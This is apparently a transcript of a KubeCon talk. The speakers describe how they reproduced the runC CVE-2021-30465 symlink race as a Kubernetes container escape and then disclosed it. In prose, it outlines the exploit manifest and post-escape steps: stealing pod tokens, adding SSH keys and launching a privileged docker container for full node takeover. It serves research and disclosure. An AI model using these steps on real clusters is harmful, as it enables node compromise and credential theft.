 Hi, everybody. Welcome to Kupka North America 2021. We're Sig Honk, a hacker crew, not an official Kubernetes SIG, and we're here to present a story for you about how we came across a run C vulnerability advisory. We flocked together to understand it, developed a proof of concept for Kubernetes for it, and shared our findings with the world. We are excited to get to share them with you. Hey, everybody. I'm Duffy Cooley, and I can be found everywhere as Maui Lyon. I host this week on Cloud Native on Cloud Native TV and EVPF office hours on YouTube. One of the big takeaways of this talk for me is that we all level each other up. It takes a village to move a project like Kubernetes forward, whether from the security perspective, writing and reviewing code, documentation, or in the day-to-day release efforts, there are so many ways to get involved. Find the part that inspires you and jump in. Everyone is welcome here. We are going to present this story as a timeline. In the lower part of your screen, you're going to see word bubbles like this one show up, and those word bubbles are going to be like exchanges that we pass back and forth as we explore this vulnerability. And we're excited about just taking you with us on that journey. Hi, I'm Rory, and I go by Racine Online. One of the challenges we all face with Cloud Native World is the complexity it has in terms of the number of overlapping projects that can be used in a cluster. Vulnerabilities can occur at any level of the stack and affect your overall environment. Also, when you're examining a vulnerability, this complexity shows up as well. So if you're trying to prove a Kubernetes vulnerability, one question is, well, which Kubernetes distributions does this affect? There's well over 100 choices to test, and if a vulnerability affects all of them, or even just the most used ones, it can be a lot of work. Hey, everyone, I'm Brad Giesemann, and I'm sometimes a mischievous goose. As a security researcher, it's important to understand that discovering and creating the proof-of-concept exploit is just the beginning of a responsible disclosure process. If your goal is to get end-users to patch as quickly as possible, you might need to take some extra steps to test the exploit on multiple different environments and provide those results in the disclosure. This can help convey a wider impact and impart the desired urgency by the vendor and community response teams. Because without that extra supporting detail, the issue can often be underrated or even downplayed by the people triaging that disclosure. Hi, I'm Ian Coldwater. I'm co-chair of Kubernetes 6 Security. Security in the cloud native ecosystem is complex. Every container system is only as secure as every part of its stack. Everything is connected in the dependency chain, but different projects are responsible for different parts. Sometimes it can be hard to know who exactly is responsible for what, especially when things connect with multiple projects. How do we solve this? Like our dependencies, we connect and depend on each other. We all take responsibility for the security of the ecosystem. When we bring our different skills and perspectives to the ecosystem as a whole, we can see things we might not have spotted by ourselves. When we work together as a community, we get farther than we would if we were working on our own. This story is one example of how it can look when different groups of people work together like that. Now, let's get into the timeline. Cool. So one of the fun problems in open source is trying to keep track of new information, which is relevant to all the different projects that make up the ecosystem, as there's loads of places where interesting things might be discussed. Now, everyone will have their own approach to this, but my three main sources for Kubernetes and container-related security are Twitter, GitHub, and Slack. This story starts in one of those places with a message that was sent to the SIG Security Channel in Slack about a vulnerability in the RunSea project, originally found by Etienne Champatier, CDE 2021 30465. Vulnerabilities in RunSea are especially interesting as it has a key role in the container ecosystem. It's the tool that actually launches containers and is used as part of many other projects, like Docker, ContainerD, and Cryo. Also, most cluster operators will never actually install RunSea directly and may not even realize they have it installed. After looking at the advisory, I had a quick look at the releases for projects that bundled RunSea, and noticed that both Docker and Cryo were yet to release a packed version, although ContainerD had. This was pretty interesting to me because it meant that a large proportion of clusters were possibly still exposed to the issue. Now, of course, that doesn't mean much if it's not possible to exploit. But in the advisory, there was an intriguing mention that with Kubernetes, it might be possible to use this to gain access to the host file system of cluster nodes. Yeah, there was no proof of concept code included in the original advisory, but there was enough detail to understand that it was likely a widely applicable container escape. The write-up mentions Kubernetes and volume mounts as the point of attack, but it's not clear exactly how. So I asked the group if we should try to recreate a POC ourselves. And I said, be the change we wish to see. Each of us brought our own perspectives to this. Brad wanted to know how it worked. I wanted to break it for fun. And Rory reminded us that we needed to raise awareness and figure out mitigations so that we could communicate that out to end users. And Duffy brought us together and heard it all the cats. So the first thing, so first I was really surprised by this one. I thought this was a very interesting CVE. And the first thing I did was create a HackMD and start gathering details. And so I pulled in the text from the CVE patch notes. I pulled in the text from the advisory and then I started throwing up a couple of theories about how this would work. This document that I'm talking about is a shared document and it will be a part of the resources at the end of this presentation if you wanna read through it. I was also thinking about how we could quickly iterate on something like this, because we needed an environment that all of us had access to that we could start playing with this and iterating on these things. For that environment, we chose to use kind. Kind is a sub project of Kubernetes and you can check it out at kind.sigs.kh.io. It's used to actually test a lot of the Kubernetes code on pull requests and it's also used to create lightweight Kubernetes clusters in Docker. And inside of each of the nodes, you'll have a version of run C just like you would on any other node inside of a Kubernetes cluster. And so that gave us a good opportunity to kind of iterate on this stuff. So often a great source of information about exploits for vulnerabilities is the blog posts of people who discovered them. So with that in mind, I went to see if Etienne had a post detailing how he'd found this issue. After finding there wasn't ending up yet, although there were a load of other great write-ups on his blog, I decided to drop Etienne a cold email to see if there's anything more he could tell us. He very kindly responded quickly and provided some useful high level information about how he'd exploited it, but not the full technical details. After all, who gives exploit code to random people who email you? Yeah. So I set up a call for us to collaborate on. Ian Brad and I jumped in. Rory was sleeping as he's in Scotland, but these geese are globally distributed for everywhere from Scotland to California. So we started working on trying to figure out how we wanted to approach creating a POSC for this because all we had really was the vulnerability associated with run C and some notes from Etienne so far. As I copied and aggregated links, I began looking through the run C fix and the tests that were associated with that and I have to say it didn't make a lot of sense to me. While Duffy was looking at the tests in the source code for that run C patch release, I was reading the patch notes on that fix, which were different from the notes on the advisory. These notes went into more detail, describing an order of operations for the attack, which gave us more insight as to how this exploit might work. The notes also called out that they thought it was an incomplete fix, that they thought there was probably more attack surface lurking there, specifically involving mount targets. That's always fun to read. What were they? How could they work? We started framing up what it would look like to exploit this. We knew it could be exploited with an empty dirt volume based on the information that Rory had learned from Etienne. It's a big clue knowing that it had to be leveraging a top towel, a time of check, time of use attack. We knew the what and the where, but we still needed to figure out the how. All of us were definitely out of our comfort zone a bit when trying to piece of vulnerability like this together enough to build an exploit. It's important that you don't get discouraged if this takes you out of your comfort zone. That's when you grow the most. This stuff is complex, just keep trying things. As you will see in the demonstration, it's kind of amazing that this stuff is found at all. It's true. The order of operations described in the advisory wasn't linear at all. It wasn't really in a kind of straightforward order, but it made intuitive sense to me because I don't really think linearly anyway. So with my ADHD brain, I was able to follow the order in the advisory, but that wasn't necessarily the case for all of us. We definitely didn't all understand it from the advisory. I tried to explain the order I understood from it. I kind of ended up sounding like conspiracy Charlie in that meme. Brad was like, hmm, I don't know about this. I'm just gonna go try and poke at it, fair enough. I'm glad he did because at the end of the day, I think it worked out better that way. If I had done it, I would have just ended up replicating the original POC. Brad's differing approach got different results and I think better ones. So as it happened, right after our initial Zoom call, there was a scheduled meeting of Kubernetes SIG Security. So it seemed like a good opportunity to check in with the rest of the SIG Security Group and also the Kubernetes Product Security Committee members, which is now known as the Security Response Committee or SRC who attended to see if there were any plans to have some disclosure or awareness around this vulnerability. The feeling we got from the SRC was that Kubernetes has a lot of dependencies and they didn't feel the SRC could be in the position of being responsible for putting out security announcements around all of them. I didn't know about this one. I love the folks on the SRC, my best friend, Tabby Sable is on the SRC, but in this particular case, I was not at all sure this was the right call because while I understood that the SRC can't be responsible for all advisories in all third-party dependencies, there are in fact a lot of them, this one in particular said in the advisory that it would be easiest to leverage from within a Kubernetes environment. It called us out specifically. And so whether or not this one was technically our problem, it had become our problem. What did this thing do in a Kubernetes environment? We weren't really quite sure yet, but clearly it did something. We wanted to figure out how it worked and make sure end users would have the information that they needed to know how to mitigate it. The information we had, my theory was, it could be a lot like the subpath Simlink race approach from a 2017 CVE. So I wanted to give that approach a shot and share the feedback with the group. My hypothesis was it could be as simple as a single pod with two containers sharing two volumes. The first container starts and immediately goes into a never ending loop replacing a specific folder with a Simlink to root. The second container then starts up, but has the second volume pointing at that specific folder that container one is changing with a Simlink, hoping that when it mounts, it follows that Simlink and gets tricked into doing so. Knowing that this is attempting to win a race condition, I initially made this deployment with 20 replicas. I even tried 50 or 100, but 20 seemed reasonable as a balance to increase the number of chances of winning. After a lot of failed runs and frustration of not seeing anything mounted in that second volume path, I got lucky. At one point, I just happened to run a loop of kube control execs to list the root directory of all the pods file systems. As it quickly scrolled by, I just happened to notice that one of them had fewer directories than all the rest and closer inspection revealed that one of them had the slash kind directory. I remember thinking, why like after exacting in and poking around, I realized the containers root was mounted from the nodes root file system, which was completely unexpected. Despite dozens of reruns though, I really had a hard time replicating. This makes sense because race conditions are notorious pain to exploit. They're finicky and they take a long time. You don't always get them. You have to keep trying and you have to wait. Sometimes it can be hard to tell if you even won the race successfully. And then when you have to do it again, they can be hard to reproduce. Yeah, it was quite irritating knowing that the race could be won, but reliability was still elusive. But a big reason for that was it didn't behave at all how we originally thought. So the first thing I wanted to do was share the fun and make sure that everyone else could replicate. So I updated the HackMD with the smallest possible working manifest and a little bit of instructions. So what we had here was a talk to vulnerability. Now a talk to vulnerability is a class of software bug caused by a race condition involving the checking of the state of a part of a system, such as in this case, sanitizing a path and the use of the results of that check. What exactly does that mean here? Well, there is a check which happens during the container startup when volumes are mounted into that container to ensure that the file system path is one which is allowed to be there. What our exploit is doing was hitting a timing vulnerability which occurs between when the run C path sanitization is done and when we overwrite the path with a sim link in the volume of the first container and then mount that volume into a subsequent container in the same pod. When we win the race, our path points to the host root file system. So I was able to reproduce the work that Brad had been able to do. And so now we actually had a few of us able to reproduce it. And I decided to start kind of working on a script that would enable us to use, to bring this exploit to other environments and prove that this thing would work. Because so far, as you saw in, or as Brad had mentioned, the way he determined the success criteria was that he could say the kind directory mounted on the underlying host. And we needed it, we needed to come up with something a little bit more portable. So I'm gonna walk you through the manifest here and then we'll talk about exactly how we determined our success criteria and that sort of stuff. So one of the first problems that we ran into was that the image polls were starting to add up too much against Docker and the accounts that we were using. And this was right around the time that Docker made the change in the amount of image polls you can actually get as a single endpoint. So what we decided to do was create a daemon set that would cache our image, the nginx stable image on all nodes. And then we would wait for that daemon set to land and be successful before deploying the deployment. The deployment actually holds the bits that we're going to use to actually try and recreate this talktel attack. So this is made up, this deployment is made up of four containers. And the first container is, again, mounting up at the nginx stable image, we have the image poll policy set to never and this way we can avoid that limitation of the Docker registry. It's because we're just going to use the nginx stable that's located right there on disk, laid down by the daemon set. And then what we're doing inside of that image is we're starting up a bashell and we're passing the following, right? We're moving into a directory that has been mounted from an empty dear volume that we named honk. And then we'd go into a while true loop where we're just constantly deleting a file if it exists called host and then simlinking the root file system over that file, right? And so the intention is that if we're successful then we should be able to see that root file system but we'll see how it works out. The subsequent containers are named one honk, two honk, three honk. And these containers are basically mounting up and sleeping forever. They mount that honk volume and then they mount another volume on top of that an empty dear volume called host. And this is the thing that we're deleting and overriding with that simlink. And so the timing attack is exactly that. We're just trying to, for these three containers and every one of the replicas as part of this deployment we're going to be trying to get that. And here is the logic of the script here, right? So what we're doing is we pull a list of all of the running pods that are not in a terminated state. We sort them by creation timestamp and then we iterate through them doing this check. And this was probably, this is the most portable way that we can figure out how to do this because it would work regardless of whether you were using coming in as root or as a user. And what it's doing is we're exacting into that pod. We're counting the number of process IDs that we see under the proc file system. And if it's more than five, then we have a success. And if it is less than five, then we delete that pod and the replicas that controller replaces that pod. And then as we work through the entire loop we'll be able to continue just to harvest pods and have a pool of pods until we actually find a successful exploit. This success criteria is in itself pretty telling and we're going to get to play with that here in the demo but like we know that we're successful because we can see more PIDs on the PID file system than we should be able to see. This will be a fun one to explore. Okay, so let's see this in action. So for this specific portable script that Duffy just went into great detail on we need create daemon sets, deployments and pods and the default namespace of a cluster. And in my test environment here I'm just showing you that it's a 1.20.2 although RunC which we'll show you here in a second is the most important. So we have one node cluster running no special workloads. This is just the base installation. And so the worker nodes this is something you can do on your system in your environment is run a RunC-Virgin. What you wanna see is 1.0.0 RC95 or later or 1.01. If you see RC94 or lower, you're likely affected. What we're gonna do is we're gonna run that script that Duffy just showed you. I'm gonna pipe it to 10 replicas because I'm running on a single node cluster. And what it's doing is it's creating that daemon set so that it caches that nginx stable image and then goes and deploys that honk deployment with the number of replicas that we talked about. And the more replicas you have the greater chances you have for success and the more opportunities the race can be won. And what we're doing is that last bit of logic Duffy showed is we're walking through and we're checking the number of PIDs in each one of them. And if it says no, we're fewer than five. If there's more than five, it'll show success. So we're just gonna sit here and basically wait until it succeeds. This is a fun one also because like, in this case, you're using Minicube to test it. But I remember when we first found it, we were like, is this an artifact of having found this vulnerability in kind? Or is this actually like, or did we actually find the one that is in Run C? Yeah, it tended to land. I don't know about my testing. I think the quickest was three, but I've had lands, you know, 120 some attempts somewhere in those ranges. Yeah, those are wide range and sometimes you just leave it for hours and you come back and go, oh, I got one. And other times it'd be like, you'd look away and suddenly, oh, I've got one. And sometimes you just don't. Yeah, yeah, absolutely. Run the whole way in now thing. We let it run. I think file system churn has a play in it too. Like if there's more file system churn happening on the underlying node, then I feel like it's a little bit more successful. Yeah, it's, I remember leaving it run. If it got past 500, we're pretty, pretty sure that it wasn't gonna happen. Yeah. Tricky proving and negative. Oh, nice. All right. Just gonna run this kube control exec and we're gonna exec into this pod. What I wanna show you is that if we run a host name, we're still inside the pod. We're still inside the container. So we're not quite there yet. It's a little bit weird. I'll explain that why that is in a second. We're in the containers network namespace. So this is the pods interface. But because we have access to the root file system and we're reading out a proc, we can see basically that's what PS is reading from. We can see all of the pits. So let's kill a, pick one of these sleep infinities. And we actually can't kill it because we're not in the host process namespace, although we are root. But because of that, it doesn't really mean we're fully limited. We have root access to the file system, read, write access to the file system. There are plenty of things that we can do. One of the things that we can do because we know we're in a Kubernetes cluster is leverage the secrets that are attached to the, let me scroll back up so you can see that command. We can do a find here. And we can look at all the tokens and the secrets that are mounted to pods running on this node. So we could do this multiple times across multiple nodes and attempt to steal all the tokens in the cluster. So that's that, that's pretty dangerous. You might have a cluster admin bound token there in the first go. The other thing we could do is get the Kubelet to run a workload for us. And this is how MiniCube is running the Kubernetes components itself, but it'd be very easy to put a privileged host path pod right here and have the Kubelet run it as a full root user. If you're a pen tester and you wanna leave a backdoor access, you could add yourself to the root's authorized keys and get in that way. That's a nice one, quick one. But also we know that we were running potentially Docker if this command succeeds. Yep, we have access to the Docker socket. So we're just one step away from being able to get full access to the node. And what do I mean by full access to the node? I'm gonna run a utility called mi-contain written originally by Jess Rizel. And we could see here that we have some capabilities but we have several block syscalls. So this is enumerating what access I have. Am I contained? Yes, I'm running in Docker. But what syscalls do I have? What are potentially blocked? Okay. Like I said, we're one command away via a Docker run. So let me paste this in. So we're gonna run a privilege container in the host's network namespace, the host paid namespace. We're gonna mount the root volume again, but inside this container as host but then we're gonna true right into it and run a bash shell. So this is effectively like, give me the full access, please. Now when we run host name, we could see, yep, it's mini cube. We look at all the interfaces. You can see all the interfaces of all the containers. And if we do run a PSEF, we can still see all the processes but we can kill a process here if we want to. I'm not going to just in case I killed a long one but I'm gonna rerun mi-contain, okay. This time, yes, we technically are running inside of Docker but we have full capabilities. We have sysm and all the other things that we need to do the damage. And so that proves here that we have the ability to leverage this to make a full node takeover. This was wild. And frankly really alarming to us because this exploit as it appears in our POC appears to give the exploited pod read write access to the host file system and a view of the host paid namespace. It's not a complete view. We can't kill processes directly but we could harvest environment variables and interact with the root file system as the root user. In the demo, we leverage that access of the Docker socket to get us to full root. We also learned during testing that this exploit is still successful even when you're not running the attack containers as root. The exploit still works because RunC is following the sim link but the access to the file system is limited to that user but because that's enough access to list all the other user IDs on the node we can rerun the attack for each of those user IDs and get their access one at a time. If any of those non-users have passwordless pseudo full root access is still possible. I mentioned to my co-chair, Tabby Sable, what we were up to. Who got curious? As we saw in the demo, we have the root FS and the PID namespace and Tabby wanted to know what was up with the PID namespace. So Tabby reached out to Duffy with technical questions and they dug in a bit in a side exploration. Yeah, that was a fun chat with Tabby. We spent some time trying to dig through and understand what namespaces we were a part of and what namespaces we weren't a part of and really it seems at the end of the day to be quite simple, right? Like that attack that we saw in the deployment and also that we've covered a couple of different times. What we're actually doing is just basically mounting a view of the root files, the root file root file system directly into the container's file system. And because of the pivot root system call and the way that that functions that becomes kind of your new root. So effectively when you exec into that new exploited container, you're kind of truiting right into that file system as it is presented to RunC. Because RunC is the thing that is, RunC is the context from which root is mounted at that point, right? It's a binary running in the root file system of the underlying node. And when you said to make a sim link of the root file system into that volume, that's exactly what it did. And so the interesting part is like when you do PS minus CF you see all those PIDs but you're really just reading from the file system mount of PROC. It's like PROC is mounted over your file system. It's not the PID namespace, which is why we can't kill processes. So it was one of those interesting explorations into capabilities and things. Now about a week later, Etienne released his POC blog post publicly, which included his fully detailed exploit code and a full write up. And that's when we learned that Ian's early understanding of the issue was spot on. Our approach ended up being similar but it ended up with a very different outcome. In Etienne's approach, it leveraged a small binary to do the sim link swapping. So a custom image was needed but it tended to win the race a bit quicker. It meant you could mount an arbitrary path from the node's file system inside the container in a subdirectory. In our approach, the manifest itself was a lot simpler as we just used bash to do the sim link swapping. But we ended up with the node's root file system mounted as the containers. Ours tends to take a bit longer to win the race but the manifest was crafted in such a way that it didn't require a custom image. I mean, we used NGINX stable but it could be any other base image that had the base Linux utilities in it. And it would be accepted by admission control aside from running as the root user to make that quick path to root. Yeah, so we tested this on various clouds and distributions to see what had or had not been patched, breaking it down and dividing up with the work amongst all of us. One unusual thing we did notice during testing is that despite having a RunC version which should have been affected, we couldn't get the exploit to work using Amazon's EKS distribution with the latest AMI. This provoked a bit of head scratching but doing some research into the error messages we were getting and also reading Etienne's original disclosure which we've received by that time, led us to realize that Amazon had put in a mitigation in place by back porting security fix without updating the RunC version number. In general, this is something you need to watch for when you're doing vulnerability research and assessment as back porting security patches is a technique used by quite a few vendors. It's also something you might want to watch out for if you're trying to figure out if you've mitigated as an end user because the version number might not actually tell you for sure. Sure. So when we were testing these things, we used the scientific method. We broke down the different cloud providers, different versions of things they were running and we tried them all to see if our hypothesis held. And what we found was that a lot of large clouds were vulnerable, a lot of default installs of major cloud provider services were exploitable. And we realized that this problem was really quite widespread and likely a lot of cluster operators and end users were gonna be at risk. So to reiterate, we knew this exploit was a complete node takeover. We knew it even could be when you weren't running that container as root and we knew that it wasn't patched in a lot of places. This was concerning. While we still weren't quite sure why this exploit worked the way it did, it was clear that it did. And it was bigger and nastier, we thought, than maybe we or maybe even other people had originally thought. I was growing increasingly concerned about this, about the impact this thing might have, how many people might be at risk for it? And the response so far had been honestly far more nonchalant than I thought it needed to be. Vendors didn't seem to be terribly concerned about being quick to patch this thing and a lot of end users might not even know that it existed. So what were we going to do about this? We figured honestly, it might be kind of up to us. We needed to be the ones to help bring more information to users and to the ecosystem. As I said earlier, be the change we wish to see. So we reached out and disclosed this to the Kubernetes security response to committee, expressing that we thought this vulnerability scope might be bigger than we had originally thought and that we thought maybe more of a response might be needed. And the SRC actually responded really well. They responded right away, understanding our concerns and encouraged us to write a blog post on the Kubernetes blog about it. We were toward end users with mitigation advice. We did write this, but it took a while to get published because as it turns out, that work around this vulnerability ended up being ongoing. So the SRC also, besides talking to us about that, talk amongst themselves. And a group of people from Google then went and continued this work, looking into this vulnerability and why exactly it was doing this thing it was doing. So they continued the research and building upon our work, they found more. Looking at our work leveraging subpath mounts, they continued going down that path and what they ended up finding was a completely new CVE, which was a vulnerability in the kubelet. CVE 2021-25741, this had a CVSS score of 8.8, making it the second most severe Kubernetes vulnerability to date. That exploit was released last month or at least the vulnerability was. In the advisory for that vulnerability, Fabricio Vozdenka and Mark Walters from Google shouted us out and said that they think Sikong for the thorough security research that led to them discovering this new vulnerability. We think that there's a lot to be learned from this story. We think that we all, if we work together, can level each other up. At the end of the day, this talk is about working together, coming together as a community and building upon each other's work so that we can figure out more, find more that's going on, bring better information to end users and make the ecosystem as a whole more secure. We think there's a lot to be learned from this and we hope that we can all continue to do that. Yeah, absolutely. And the thing I took away from the story is just the sheer complexity of the cloud native ecosystem, both in terms of the vertical stack of software that's used when running Kubernetes and also the breadth of options available and how it makes it hard for both researchers and cluster operators to understand where vulnerabilities lie and how they might impact their security. I think it's an important consideration for the community to keep focusing on communications and making sure that security information is as clear as possible, especially to users who may not spend all their time spelunking around projects like we do. Yeah, for me, there are a couple of things that are worth sharing about this journey. First, the appreciation of being able to work in a team where we all get to lean on each other's unique perspectives and abilities. And we all provide full encouragement of all honking activities. We got a little bit lucky, sure, but without that level of effective collaboration, I could easily imagine a scenario where we didn't overcome the confusing or frustrating parts and there were plenty of those. And lastly, knowing that this team effort raised more awareness of the vulnerability and helped the main goal of getting vendors to release patches to end users quicker, I think that brings us all a lot of satisfaction. All of us played a part in this and it was really fun to explore an interesting new attack together. Here is a slide with reference material and it'll take you to the links for the same link script that we wrote. It'll take you to our HackMD notes that we originally gathered context with and it'll also show you the CVE documentation for both ETNs and also the one that Ian referred to. Oh, and one more thing. Hunt the planet! Thanks, everybody. Thank you, everyone. We're gonna present this slide in the Slack chat as well. We're gonna be here to answer your questions and you might see a couple of us roaming around the halls at our KubeCon, so see you all next time.